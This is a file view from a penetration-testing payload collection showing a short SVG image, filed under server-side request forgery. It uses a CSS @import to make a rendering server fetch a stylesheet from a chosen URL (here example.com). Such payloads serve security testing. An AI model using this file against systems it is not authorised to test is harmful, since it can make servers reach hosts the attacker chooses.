PayloadsAllTheThings/Server Side Request Forgery/Files/ssrf_svg_css_import.svg

7 lines
188 B
XML
Raw Normal View History

2019-08-15 16:21:06 +00:00
<svg xmlns="http://www.w3.org/2000/svg">
<style>
@import url(http://example.com/style.css);
</style>
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
</svg>